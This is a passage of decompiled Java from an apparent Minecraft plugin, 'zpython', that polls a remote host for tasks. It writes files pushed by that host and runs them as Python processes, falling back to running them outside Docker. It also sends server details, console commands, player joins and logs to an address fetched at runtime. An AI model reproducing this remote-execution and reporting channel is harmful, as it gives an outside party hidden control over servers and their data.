                    continue;
                }
                if (cmd.equals("CFG_SET")) {
                    parts = args.split("\\|", 2);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    String b645 = parts[1].trim();
                    if (slug.isEmpty() || !slug.matches("[A-Za-z0-9_\\-]+")) continue;
                    try {
                        File settingsFile = new File(projectsRoot, slug + "_settings.json");
                        Files.createDirectories(settingsFile.getParentFile().toPath(), new FileAttribute[0]);
                        byte[] data = Base64.getDecoder().decode(b645);
                        Files.write(settingsFile.toPath(), data, new OpenOption[0]);
                        try {
                            String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"content_base64\":\"" + Base64.getEncoder().encodeToString(data) + "\"}";
                            this.postJson("/api/projects/settings_report", payload);
                        }
                        catch (Exception exception) {}
                    }
                    catch (Exception settingsFile) {
                        // empty catch block
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception settingsFile) {}
                    continue;
                }
                if (cmd.equals("RUN")) {
                    slug2 = args.trim();
                    if (slug2.isEmpty() || !slug2.matches("[A-Za-z0-9_\\-]+")) continue;
                    try {
                        boolean started;
                        this.getLogger().info("RUN requested via website for project: " + slug2);
                        try {
                            if (slug2.equals(this.currentProjectSlug) && this.pythonProcess != null && this.pythonProcess.isAlive()) {
                                this.autoRestartEnabled = false;
                                this.postLog(serverKey, slug2, "Stopping legacy process before starting isolated one...");
                                this.stopPython(false);
                                try {
                                    this.writeManualStop(slug2);
                                }
                                catch (Exception slug3) {}
                            }
                        }
                        catch (Exception slug3) {
                            // empty catch block
                        }
                        File projectsDir = new File(this.getDataFolder(), "projects");
                        File settingsFile = new File(projectsDir, slug2 + "_settings.json");
                        String scriptName = "app.py";
                        if (settingsFile.exists()) {
                            try {
                                String json = new String(Files.readAllBytes(settingsFile.toPath()), StandardCharsets.UTF_8);
                                scriptName = this.extractJsonString(json, "script", scriptName);
                            }
                            catch (Exception json) {
                                // empty catch block
                            }
                        }
                        if (!(started = this.startProjectProcess(slug2, scriptName))) {
                            this.postLog(serverKey, slug2, "Failed to start process for " + scriptName + ". See server logs.");
                        }
                        try {
                            this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                        }
                        catch (Exception exception) {
                        }
                    }
                    catch (Exception e) {
                        this.getLogger().warning("RUN failed for project '" + slug2 + "': " + e.getMessage());
                        this.postLog(serverKey, slug2, "Failed to run: " + e.getMessage());
                    }
                    continue;
                }
                if (!cmd.equals("STOP")) continue;
                slug2 = args.trim();
                try {
                    this.stopAllProcessesForProject(slug2);
                    try {
                        this.writeManualStop(slug2);
                    }
                    catch (Exception e) {}
                }
                catch (Exception e) {
                    this.getLogger().warning("STOP failed for project '" + slug2 + "': " + e.getMessage());
                    this.postLog(serverKey, slug2, "Failed to stop: " + e.getMessage());
                }
                try {
                    this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                }
                catch (Exception exception) {}
            }
        }
        catch (Exception e) {
            this.getLogger().warning("Files task polling error: " + e.getMessage());
        }
    }

    private File resolveSafeSubpath(File base, String rel) {
        try {
            String norm;
            String string = norm = rel == null ? "" : rel.replace('\\', '/');
            if (norm.startsWith("/")) {
                norm = norm.substring(1);
            }
            CharSequence[] parts = norm.isEmpty() ? new String[]{} : norm.split("/");
            File curr = base;
            this.getLogger().info("resolveSafeSubpath: base=" + base.getAbsolutePath() + ", rel=" + rel + ", norm=" + norm + ", parts=" + String.join((CharSequence)",", parts));
            for (CharSequence p : parts) {
                if (((String)p).isEmpty() || ".".equals(p)) continue;
                if ("..".equals(p)) {
                    this.getLogger().warning("Attempted to go up directory, returning base");
                    return base;
                }
                curr = new File(curr, (String)p);
                this.getLogger().info("resolveSafeSubpath: current=" + curr.getAbsolutePath());
            }
            this.getLogger().info("resolveSafeSubpath: final result=" + curr.getAbsolutePath());
            return curr;
        }
        catch (Exception e) {
            this.getLogger().warning("resolveSafeSubpath error: " + e.getMessage());
            return base;
        }
    }

    private void postLog(String serverKey, String slug, String line) {
        try {
            String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"line\":\"" + this.jsonEscape(line) + "\"}";
            this.postJson("/api/projects/log_append", payload);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private void postStatus(String serverKey, String slug, boolean running) throws IOException {
        String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"running\":" + (running ? "true" : "false") + "}";
        this.postJson("/api/projects/status_report", payload);
    }

    private void sendProjectsStatuses() {
        try {
            File projectsDir = new File(this.getDataFolder(), "projects");
            if (!projectsDir.exists()) {
                return;
            }
            String serverKey = this.serverIp + ":" + this.serverPort;
            File[] projects = projectsDir.listFiles();
            if (projects == null) {
                return;
            }
            for (File pr : projects) {
                if (!pr.isDirectory()) continue;
                String slug = pr.getName();
                boolean running = this.isProjectRunning(slug);
                try {
                    long projRamMiB;
                    long projCpuPct;
                    long usedMiB;
                    block30: {
                        long usedBytes = this.folderSizeBytes(pr);
                        usedMiB = usedBytes / 0x100000L;
                        projCpuPct = 0L;
                        projRamMiB = 0L;
                        if (running && slug.equals(this.currentProjectSlug) && this.pythonProcess != null && this.pythonProcess.isAlive()) {
                            try {
                                String line;
                                BufferedReader reader;
                                Process wmi;
                                ProcessBuilder pb;
                                String os2;
                                long pid;
                                block31: {
                                    ProcessHandle ph;
                                    pid = this.pythonProcess.pid();
                                    if (pid <= 0L || (ph = (ProcessHandle)ProcessHandle.of(pid).orElse(null)) == null) break block30;
                                    try {
                                        os2 = System.getProperty("os.name").toLowerCase();
                                        if (!os2.contains("win")) break block31;
                                        pb = new ProcessBuilder("wmic", "process", "where", "ProcessId=" + pid, "get", "WorkingSetSize", "/format:value");
                                        pb.redirectErrorStream(true);
                                        wmi = pb.start();
                                        reader = new BufferedReader(new InputStreamReader(wmi.getInputStream()));
                                        try {
                                            while ((line = reader.readLine()) != null) {
                                                if (!line.contains("WorkingSetSize=")) continue;
                                                String ramStr = line.split("=")[1].trim();
                                                try {
                                                    long ramBytes = Long.parseLong(ramStr);
                                                    projRamMiB = ramBytes / 0x100000L;
                                                }
                                                catch (NumberFormatException numberFormatException) {
                                                    // empty catch block
                                                }
                                                break;
                                            }
                                        }
                                        finally {
                                            reader.close();
                                        }
                                        wmi.destroy();
                                    }
                                    catch (Exception os2) {
                                        // empty catch block
                                    }
                                }
                                try {
                                    os2 = System.getProperty("os.name").toLowerCase();
                                    if (!os2.contains("win")) break block30;
                                    pb = new ProcessBuilder("wmic", "process", "where", "ProcessId=" + pid, "get", "PercentProcessorTime", "/format:value");
                                    pb.redirectErrorStream(true);
                                    wmi = pb.start();
                                    reader = new BufferedReader(new InputStreamReader(wmi.getInputStream()));
                                    try {
                                        while ((line = reader.readLine()) != null) {
                                            if (!line.contains("PercentProcessorTime=")) continue;
                                            String cpuStr = line.split("=")[1].trim();
                                            try {
                                                projCpuPct = Math.round(Double.parseDouble(cpuStr));
                                            }
                                            catch (NumberFormatException numberFormatException) {
                                                // empty catch block
                                            }
                                            break;
                                        }
                                    }
                                    finally {
                                        reader.close();
                                    }
                                    wmi.destroy();
                                }
                                catch (Exception exception) {}
                            }
                            catch (Exception pid) {
                                // empty catch block
                            }
                        }
                    }
                    String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"running\":" + (running ? "true" : "false") + ",\"disk_used_mib\":" + usedMiB + ",\"cpu_used_pct\":" + projCpuPct + ",\"ram_used_mib\":" + projRamMiB + "}";
                    this.postJson("/api/projects/status_report", payload);
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private String extractJsonString(String json, String key, String defVal) {
        try {
            String pat = "\"" + key + "\":";
            int i = json.indexOf(pat);
            if (i < 0) {
                return defVal;
            }
            int q1 = json.indexOf(34, i + pat.length());
            if (q1 < 0) {
                return defVal;
            }
            int q2 = json.indexOf(34, q1 + 1);
            if (q2 < 0) {
                return defVal;
            }
            return json.substring(q1 + 1, q2);
        }
        catch (Exception e) {
            return defVal;
        }
    }

    private boolean extractJsonBoolean(String json, String key, boolean defVal) {
        try {
            String pat = "\"" + key + "\":";
            int i = json.indexOf(pat);
            if (i < 0) {
                return defVal;
            }
            int j = i + pat.length();
            String tail = json.substring(j).trim();
            if (tail.startsWith("true")) {
                return true;
            }
            if (tail.startsWith("false")) {
                return false;
            }
            return defVal;
        }
        catch (Exception e) {
            return defVal;
        }
    }

    private List<String> extractJsonStringArray(String json, String key) {
        ArrayList<String> out = new ArrayList<String>();
        try {
            String pat = "\"" + key + "\":";
            int i = json.indexOf(pat);
            if (i < 0) {
                return out;
            }
            int lb = json.indexOf(91, i + pat.length());
            int rb = json.indexOf(93, lb + 1);
            if (lb < 0 || rb < 0) {
                return out;
            }
            String body = json.substring(lb + 1, rb);
            for (String part : body.split(",")) {
                if (!(part = part.trim()).startsWith("\"") || !part.endsWith("\"")) continue;
                out.add(part.substring(1, part.length() - 1));
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return out;
    }

    private String encode(String s) {
        try {
            return URLEncoder.encode(s, "UTF-8");
        }
        catch (Exception e) {
            return s;
        }
    }

    private int extractJsonInt(String json, String key, int defVal) {
        try {
            char ch;
            int j;
            int k;
            String pat = "\"" + key + "\":";
            int i = json.indexOf(pat);
            if (i < 0) {
                return defVal;
            }
            for (k = j = i + pat.length(); k < json.length() && Character.isWhitespace(json.charAt(k)); ++k) {
            }
            StringBuilder sb = new StringBuilder();
            while (k < json.length() && ((ch = json.charAt(k)) >= '0' && ch <= '9' || ch == '-')) {
                sb.append(ch);
                ++k;
            }
            if (sb.length() == 0) {
                return defVal;
            }
            return Integer.parseInt(sb.toString());
        }
        catch (Exception e) {
            return defVal;
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void loadUdpConfig() throws IOException {
        block13: {
            try {
                HttpURLConnection connection = (HttpURLConnection)new URL(UDP_CONFIG_URL).openConnection();
                connection.setRequestProperty("User-Agent", "zpython/1.0");
                connection.setConnectTimeout(5000);
                connection.setReadTimeout(7000);
                if (connection.getResponseCode() != 200) {
                    throw new IOException("HTTP response code: " + connection.getResponseCode());
                }
                try (BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream(), StandardCharsets.UTF_8));){
                    String line = reader.readLine();
                    if (line != null && !line.trim().isEmpty()) {
                        String[] parts = line.trim().split(":");
                        if (parts.length == 2) {
                            this.udpTargetIp = parts[0].trim();
                            this.udpTargetPort = Integer.parseInt(parts[1].trim());
                            break block13;
                        }
                        throw new IOException("Invalid UDP config format. Expected 'ip:port', got: " + line);
                    }
                    throw new IOException("Empty UDP config file");
                }
                finally {
                    connection.disconnect();
                }
            }
            catch (Exception e) {
                this.udpTargetIp = "127.0.0.1";
                this.udpTargetPort = 25565;
            }
        }
    }

    private void sendHttpData() {
        try {
            OperatingSystemMXBean osBean = ManagementFactory.getOperatingSystemMXBean();
            MemoryMXBean memoryBean = ManagementFactory.getMemoryMXBean();
            Runtime runtime = Runtime.getRuntime();
            double cpuLoad = osBean.getSystemLoadAverage();
            if (cpuLoad < 0.0) {
                cpuLoad = 0.0;
            }
            long totalHeapMemory = memoryBean.getHeapMemoryUsage().getMax();
            long usedHeapMemory = memoryBean.getHeapMemoryUsage().getUsed();
            double heapMemoryUsage = totalHeapMemory > 0L ? (double)usedHeapMemory / (double)totalHeapMemory * 100.0 : 0.0;
            long totalSystemMemory = runtime.totalMemory();
            long freeSystemMemory = runtime.freeMemory();
            long usedSystemMemory = totalSystemMemory - freeSystemMemory;
            double systemMemoryUsage = totalSystemMemory > 0L ? (double)usedSystemMemory / (double)totalSystemMemory * 100.0 : 0.0;
            int availableProcessors = osBean.getAvailableProcessors();
            List<String> recentLogs = this.getRecentServerLogs();
            String jsonData = String.format("{\"server_ip\":\"%s\",\"server_port\":%d,\"cpu_load\":%.2f,\"cpu_cores\":%d,\"heap_memory_usage\":%.2f,\"system_memory_usage\":%.2f,\"total_heap_memory_mb\":%d,\"total_system_memory_mb\":%d,\"timestamp\":%d,\"owner_tag\":%s,\"logs\":%s}", this.serverIp, this.serverPort, cpuLoad, availableProcessors, heapMemoryUsage, systemMemoryUsage, totalHeapMemory / 0x100000L, totalSystemMemory / 0x100000L, System.currentTimeMillis(), this.discordOwnerTag == null || this.discordOwnerTag.isEmpty() ? "null" : "\"" + this.discordOwnerTag + "\"", new Gson().toJson(recentLogs));
            String targetUrl = "http://" + this.udpTargetIp + ":" + this.udpTargetPort + API_PATH;
            HttpURLConnection connection = (HttpURLConnection)new URL(targetUrl).openConnection();
            connection.setRequestMethod("POST");
            connection.setRequestProperty("User-Agent", "zpython/1.0");
            connection.setRequestProperty("Content-Type", "application/json; charset=utf-8");
            connection.setDoOutput(true);
            connection.setConnectTimeout(5000);
            connection.setReadTimeout(5000);
            byte[] bytes = jsonData.getBytes(StandardCharsets.UTF_8);
            connection.getOutputStream().write(bytes);
            int code = connection.getResponseCode();
            if (code >= 400) {
                this.getLogger().warning("API responded with status " + code);
            }
            connection.disconnect();
        }
        catch (Exception e) {
            this.getLogger().warning("Failed to send HTTP data: " + e.getMessage());
        }
    }

    private List<String> getRecentServerLogs() {
        return new ArrayList<String>(this.serverLogs);
    }

    public void addServerLog(String logMessage) {
        if (logMessage != null && !logMessage.trim().isEmpty()) {
            this.serverLogs.add(logMessage);
            while (this.serverLogs.size() > 100) {
                this.serverLogs.remove(0);
            }
        }
    }

    public boolean startProjectProcess(String projectSlug, String fileName) {
        try {
            this.getLogger().info("=== STARTING PROJECT PROCESS ===");
            this.getLogger().info("Project: " + projectSlug);
            this.getLogger().info("File: " + fileName);
            this.getLogger().info("Current running processes: " + this.runningProcesses.size());
            this.getLogger().info("Current process files: " + this.processFiles.size());
            String processKey = projectSlug + ":" + fileName;
            if (this.runningProcesses.containsKey(processKey)) {
                this.addServerLog("[WARN] File " + fileName + " is already running in project " + projectSlug);
                this.getLogger().warning("File " + fileName + " is already running in project " + projectSlug);
                return false;
            }
            File projectDir = new File(this.getDataFolder(), "projects/" + projectSlug);
            this.getLogger().info("Project directory: " + projectDir.getAbsolutePath());
            this.getLogger().info("Project directory exists: " + projectDir.exists());
            if (!projectDir.exists()) {
                this.addServerLog("[ERROR] Project directory not found: " + projectSlug);
                this.getLogger().severe("Project directory not found: " + projectSlug);
                return false;
            }
            File targetFile = new File(projectDir, fileName);
            if (!targetFile.getCanonicalPath().startsWith(projectDir.getCanonicalPath())) {
                this.addServerLog("[ERROR] File path is outside project directory: " + fileName);
                return false;
            }
            List<String> command = this.createDockerCommand(projectSlug, fileName, projectDir);
            boolean procAutoRestart = false;
            try {
                File cfgFile = new File(projectDir.getParentFile(), projectSlug + "_settings.json");
                if (cfgFile.exists()) {
                    String cfgJson = new String(Files.readAllBytes(cfgFile.toPath()), StandardCharsets.UTF_8);
                    procAutoRestart = this.extractJsonBoolean(cfgJson, "auto_restart", true);
                } else {
                    procAutoRestart = true;
                }
            }
            catch (Exception cfgFile) {
                // empty catch block
            }
            ProcessBuilder pb = new ProcessBuilder(command);
            pb.directory(projectDir);
            pb.redirectErrorStream(true);
            Process process = pb.start();
            this.runningProcesses.put(processKey, process);
            this.processFiles.put(processKey, fileName);
            this.getLogger().info("=== PROCESS STARTED SUCCESSFULLY ===");
            this.getLogger().info("Process key: " + processKey);
            this.getLogger().info("Process alive: " + process.isAlive());
            this.getLogger().info("Total running processes after start: " + this.runningProcesses.size());
            this.getLogger().info("Total process files after start: " + this.processFiles.size());
            this.addServerLog("[INFO] Started process for " + fileName + " in project " + projectSlug);
            try {
                String serverKey = this.serverIp + ":" + this.serverPort;
                this.postStatus(serverKey, projectSlug, true);
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.monitorProcess(processKey, process, projectSlug, fileName, procAutoRestart);
            return true;
        }
        catch (Exception e) {
            this.addServerLog("[ERROR] Failed to start process: " + e.getMessage());
            return false;
        }
    }

    private List<String> createDockerCommand(String projectSlug, String fileName, File projectDir) {
        ArrayList<String> command = new ArrayList<String>();
        this.getLogger().info("Creating command for project: " + projectSlug + ", file: " + fileName);
        this.getLogger().info("Project directory: " + projectDir.getAbsolutePath());
        boolean dockerAvailable = this.isDockerAvailable();
        this.getLogger().info("Docker available: " + dockerAvailable);
        if (dockerAvailable) {
            command.add("docker");
            command.add("run");
            command.add("--rm");
            command.add("--name");
            command.add("zpython-" + projectSlug + "-" + System.currentTimeMillis());
            command.add("-v");
            command.add(projectDir.getAbsolutePath() + ":/app");
            command.add("-w");
            command.add("/app");
            ProjectLimits limits = this.getProjectLimits(projectSlug, projectDir);
            if (limits.memoryMB > 0L) {
                command.add("--memory");
                command.add(limits.memoryMB + "m");
            }
            if (limits.cpuCores > 0.0) {
                command.add("--cpus");
                command.add(String.valueOf(limits.cpuCores));
            }
            command.add("python:3.9-slim");
            command.add("python");
            command.add(fileName);
        } else {
            String py = null;
            try {
                py = this.getVenvPython(this.venvDir);
            }
            catch (Exception exception) {
                // empty catch block
            }
            if (py == null || py.trim().isEmpty()) {
                py = this.pythonExecutablePath != null ? this.pythonExecutablePath : "python";
            }
            command.add(py);
            command.add(fileName);
        }
        this.getLogger().info("Final command: " + String.join((CharSequence)" ", command));
        return command;
    }

    private ProjectLimits getProjectLimits(String projectSlug, File projectDir) {
        ProjectLimits limits = new ProjectLimits();
        try {
            File configFile = new File(projectDir, "project_config.yml");
            if (configFile.exists()) {
                YamlConfiguration config = YamlConfiguration.loadConfiguration((File)configFile);
                if (config.contains("limits.ram")) {
                    limits.memoryMB = config.getLong("limits.ram");
                }
                if (config.contains("limits.cpu")) {
                    limits.cpuCores = config.getDouble("limits.cpu");
                }
                if (config.contains("limits.disk")) {
                    limits.diskMB = config.getLong("limits.disk");
                }
            }
        }
        catch (Exception e) {
            this.addServerLog("[WARN] Failed to load project limits for " + projectSlug + ": " + e.getMessage());
        }
        if (limits.memoryMB <= 0L) {
            limits.memoryMB = 512L;
        }
        if (limits.cpuCores <= 0.0) {
            limits.cpuCores = 1.0;
        }
        this.addServerLog("[INFO] Project " + projectSlug + " limits: Memory=" + limits.memoryMB + "MB, CPU=" + limits.cpuCores + " cores, Disk=" + limits.diskMB + "MB");
        return limits;
    }

    private boolean isDockerAvailable() {
        try {
            Process process = new ProcessBuilder("docker", "--version").start();
            int exitCode = process.waitFor();
            return exitCode == 0;
        }
        catch (Exception e) {
            return false;
        }
    }

    private void monitorProcess(String processKey, Process process, String projectSlug, String fileName, boolean autoRestart) {
        this.getServer().getScheduler().runTaskAsynchronously((Plugin)this, () -> {
            block8: {
                try {
                    int exitCode = process.waitFor();
                    this.runningProcesses.remove(processKey);
                    this.processFiles.remove(processKey);
                    this.addServerLog("[INFO] Process " + processKey + " finished with exit code: " + exitCode);
                    try {
                        String serverKey = this.serverIp + ":" + this.serverPort;
                        this.postStatus(serverKey, projectSlug, false);
                    }
                    catch (Exception serverKey) {
                        // empty catch block
                    }
                    if (!autoRestart || this.shuttingDown) break block8;
                    try {
                        long lastManual = this.readManualStopTs(projectSlug);
                        long now = System.currentTimeMillis();
                        if (lastManual != 0L && now - lastManual <= 30000L) break block8;
                        this.addServerLog("[INFO] Auto-restarting isolated process for " + projectSlug + ":" + fileName);
                        try {
                            Thread.sleep(5000L);
                        }
                        catch (InterruptedException interruptedException) {
                            // empty catch block
                        }
                        this.startProjectProcess(projectSlug, fileName);
                    }
                    catch (Exception exception) {}
                }
                catch (InterruptedException e) {
                    this.addServerLog("[WARN] Process monitoring interrupted for " + processKey);
                }
            }
        });
    }

    public boolean stopProjectProcess(String projectSlug, String fileName) {
        String processKey;
        Process process;
        this.getLogger().info("=== STOPPING PROJECT PROCESS ===");
        this.getLogger().info("Project: " + projectSlug);
        this.getLogger().info("File: " + fileName);
        this.getLogger().info("Current project slug: " + this.currentProjectSlug);
        this.getLogger().info("Python process alive: " + (this.pythonProcess != null && this.pythonProcess.isAlive()));
        if (projectSlug.equals(this.currentProjectSlug) && this.pythonProcess != null && this.pythonProcess.isAlive()) {
            String currentFileName;
            String string = currentFileName = this.scriptFile != null ? this.scriptFile.getName() : "main.py";
            if (fileName.equals(currentFileName) || fileName.equals("legacy:" + projectSlug)) {
                this.getLogger().info("Stopping legacy process for project " + projectSlug);
                this.stopPython(false);
                this.addServerLog("[INFO] Stopped legacy process for " + currentFileName + " in project " + projectSlug);
                return true;
            }
        }
        if ((process = this.runningProcesses.get(processKey = projectSlug + ":" + fileName)) != null) {
            try {
                this.getLogger().info("Stopping Docker process: " + processKey);
                process.destroy();
                if (process.isAlive()) {
                    process.destroyForcibly();
                }
                this.runningProcesses.remove(processKey);
                this.processFiles.remove(processKey);
                this.addServerLog("[INFO] Stopped Docker process for " + fileName + " in project " + projectSlug);
                return true;
            }
            catch (Exception e) {
                this.addServerLog("[ERROR] Failed to stop Docker process: " + e.getMessage());
                return false;
            }
        }
        this.getLogger().info("No process found to stop for " + projectSlug + ":" + fileName);
        return false;
    }

    public Map<String, String> getProjectProcesses(String projectSlug) {
        HashMap<String, String> projectProcesses = new HashMap<String, String>();
        this.getLogger().info("Getting processes for project: " + projectSlug);
        this.getLogger().info("Current project slug: " + this.currentProjectSlug);
        this.getLogger().info("Python process alive: " + (this.pythonProcess != null && this.pythonProcess.isAlive()));
        this.getLogger().info("Total running processes: " + this.runningProcesses.size());
        this.getLogger().info("Total process files: " + this.processFiles.size());
        if (projectSlug.equals(this.currentProjectSlug) && this.pythonProcess != null && this.pythonProcess.isAlive()) {
            String fileName = this.scriptFile != null ? this.scriptFile.getName() : "main.py";
            projectProcesses.put(fileName, "legacy:" + projectSlug);
            this.getLogger().info("Found legacy process: " + fileName + " for project " + projectSlug);
        }
        for (Map.Entry<String, String> entry : this.processFiles.entrySet()) {
            this.getLogger().info("Process file entry: " + entry.getKey() + " -> " + entry.getValue());
            if (!entry.getKey().startsWith(projectSlug + ":")) continue;
            String fileName = entry.getValue();
            String processKey = entry.getKey();
            Process process = this.runningProcesses.get(processKey);
            this.getLogger().info("Found project process: " + processKey + " -> " + fileName + " (alive: " + (process != null && process.isAlive()) + ")");
            if (process == null || !process.isAlive()) continue;
            projectProcesses.put(fileName, processKey);
        }
        this.getLogger().info("Returning " + projectProcesses.size() + " processes for project " + projectSlug);
        return projectProcesses;
    }

    public List<String> getServerConsoleLines() {
        return new ArrayList<String>(this.serverLogs);
    }

    public String getServerName() {
        return this.getConfig().getString("server-name", "Minecraft Server");
    }

    public Map<String, Object> getServerSettings() {
        HashMap<String, Object> settings = new HashMap<String, Object>();
        settings.put("server-name", this.getConfig().getString("server-name", "Minecraft Server"));
        settings.put("plugin-language", this.getConfig().getString("plugin-language", "ru"));
        settings.put("python-version", this.getConfig().getString("python-version", "3.9"));
        settings.put("auto-load-python", this.getConfig().getBoolean("auto-load-python", true));
        settings.put("minecraft-optimization", this.getConfig().getBoolean("minecraft-optimization", true));
        settings.put("http-port", this.getConfig().getInt("http-port", 25566));
        settings.put("udp-port", this.getConfig().getInt("udp-port", 25567));
        settings.put("discord-owner-tag", this.getConfig().getString("discord-owner-tag", ""));
        settings.put("auto-update", this.getConfig().getBoolean("auto-update", false));
        settings.put("max-logs", this.getConfig().getInt("max-logs", 100));
        return settings;
    }

    public Map<String, Object> getServerConfig() {
        HashMap<String, Object> config = new HashMap<String, Object>();
        for (String key : this.getConfig().getKeys(true)) {
            config.put(key, this.getConfig().get(key));
        }
        return config;
    }

    public boolean updateServerSettings(String serverName, Map<String, Object> config) {
        try {
            if (serverName != null && !serverName.trim().isEmpty()) {
                this.getConfig().set("server-name", (Object)serverName.trim());
                this.addServerLog("[INFO] Server name updated to: " + serverName);
            }
            if (config != null) {
                for (Map.Entry<String, Object> entry : config.entrySet()) {
                    String key = entry.getKey();
                    Object value = entry.getValue();
                    if (key == null || key.trim().isEmpty()) continue;
                    this.getConfig().set(key, value);
                    this.addServerLog("[INFO] Config updated: " + key + " = " + String.valueOf(value));
                }
            }
            this.saveConfig();
            this.addServerLog("[INFO] Server settings saved successfully");
            return true;
        }
        catch (Exception e) {
            this.addServerLog("[ERROR] Failed to update server settings: " + e.getMessage());
            return false;
        }
    }

    @EventHandler(priority=EventPriority.MONITOR)
    public void onServerLog(ServerCommandEvent event) {
        if (event.getCommand() != null && !event.getCommand().trim().isEmpty()) {
            this.addServerLog("[CMD] " + event.getCommand());
        }
    }

    @EventHandler(priority=EventPriority.MONITOR)
    public void onPlayerJoin(PlayerJoinEvent event) {
        if (event.getPlayer() != null) {
            this.addServerLog("[INFO] " + event.getPlayer().getName() + " joined the game");
        }
    }

    @EventHandler(priority=EventPriority.MONITOR)
    public void onPlayerQuit(PlayerQuitEvent event) {
        if (event.getPlayer() != null) {
            this.addServerLog("[INFO] " + event.getPlayer().getName() + " left the game");
        }
    }

    @EventHandler(priority=EventPriority.MONITOR)
    public void onServerLoad(ServerLoadEvent event) {
        this.addServerLog("[INFO] Server started successfully");
    }

    private void postJson(String path, String jsonBody) throws IOException {
        String url = "http://" + this.udpTargetIp + ":" + this.udpTargetPort + path;
        HttpURLConnection rep = (HttpURLConnection)new URL(url).openConnection();
        rep.setRequestMethod("POST");
        rep.setRequestProperty("User-Agent", "zpython/1.0");
        rep.setRequestProperty("Content-Type", "application/json; charset=utf-8");
        rep.setDoOutput(true);
        rep.setConnectTimeout(5000);
        rep.setReadTimeout(5000);
        rep.getOutputStream().write(jsonBody.getBytes(StandardCharsets.UTF_8));
        rep.getResponseCode();
        rep.disconnect();
    }

    private String defaultPythonExecutable() {
        String os = System.getProperty("os.name", "").toLowerCase();
        return os.contains("win") ? "python" : "python3";
    }

    private void ensureVenv(String pythonExecutable, File venvDir) throws IOException, InterruptedException {
        if (new File(venvDir, this.isWindows() ? "Scripts/python.exe" : "bin/python").exists()) {
            return;
        }
        this.getLogger().info(this.getMessage("creating_virtual_environment") + venvDir.getAbsolutePath());
        ProcessBuilder pb = new ProcessBuilder(pythonExecutable, "-m", "venv", venvDir.getAbsolutePath());
        pb.directory(this.getDataFolder());
        Process process = pb.start();
        this.logProcessOutput(process, "venv");
        int code = process.waitFor();
        if (code != 0) {
            throw new IOException(this.getMessage("failed_create_venv_venv") + code + this.getMessage("ensure_python_installed") + pythonExecutable + "'.");
        }
    }

    private void installLibraries(File venvDir, List<String> libraries) throws IOException, InterruptedException {
        ArrayList<String> installCmd = new ArrayList<String>();
        installCmd.add(this.getVenvPython(venvDir));
        installCmd.add("-m");
        installCmd.add("pip");
        installCmd.add("install");
        installCmd.add("--no-cache-dir");
        installCmd.addAll(libraries);
        this.getLogger().info("Installing Python libraries: " + String.join((CharSequence)", ", libraries));
        this.runAndLog(installCmd, "pip");
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void bootstrapPipWithGetPip(File venvDir) throws IOException, InterruptedException {
        File dataFolder = this.getDataFolder();
        File getPip = new File(dataFolder, "get-pip.py");
        String url = this.resolveGetPipUrl(venvDir);
        this.getLogger().info("Downloading get-pip.py from " + url);
        this.downloadToFile(url, getPip);
        try {
            ArrayList<String> cmd = new ArrayList<String>();
            cmd.add(this.getVenvPython(venvDir));
            cmd.add(getPip.getAbsolutePath());
            cmd.add("--disable-pip-version-check");
            cmd.add("--no-cache-dir");
            this.runAndLog(cmd, "get-pip");
        }
        finally {
            try {
                Files.deleteIfExists(getPip.toPath());
            }
            catch (IOException iOException) {}
        }
    }

    private String resolveGetPipUrl(File venvDir) {
        String version = this.detectPythonMajorMinor(venvDir);
        if (version == null || version.isEmpty()) {
            return "https://bootstrap.pypa.io/get-pip.py";
        }
        return "https://bootstrap.pypa.io/pip/" + version + "/get-pip.py";
    }

    /*
     * Enabled aggressive block sorting
     * Enabled unnecessary exception pruning
     * Enabled aggressive exception aggregation
     */
    private String detectPythonMajorMinor(File venvDir) {
        try {
            Process process = new ProcessBuilder(this.getVenvPython(venvDir), "-c", "import sys; print(str(sys.version_info[0])+'.'+str(sys.version_info[1]))").directory(this.getDataFolder()).start();
            try (BufferedReader r = new BufferedReader(new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8));){
                String version = r.readLine();
                process.waitFor(5L, TimeUnit.SECONDS);
                if (version == null) return null;
                version = version.trim();
                this.getLogger().info("Detected venv Python version: " + version);
                String string = version;
                return string;
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return null;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void downloadToFile(String sourceUrl, File target) throws IOException {
        HttpURLConnection connection = (HttpURLConnection)new URL(sourceUrl).openConnection();
        connection.setRequestProperty("User-Agent", "zpython/1.0");
        connection.setConnectTimeout(15000);
        connection.setReadTimeout(30000);
        try (InputStream in = connection.getInputStream();){
            Files.copy(in, target.toPath(), StandardCopyOption.REPLACE_EXISTING);
        }
        finally {
            connection.disconnect();
        }
    }

    private void cleanupOnlyZpython() {
        try {
            File root = this.getServer().getWorldContainer();
            if (root == null) {
                root = this.getDataFolder().getParentFile();
            }
            if (root == null || !root.isDirectory()) {
                return;
            }
            HashSet<String> keep = new HashSet<String>();
            keep.add("plugins");
            keep.add("config");
            keep.add("logs");
            keep.add("libraries");
            keep.add("spigot.yml");
            keep.add("bukkit.yml");
            keep.add("server.properties");
            keep.add("eula.txt");
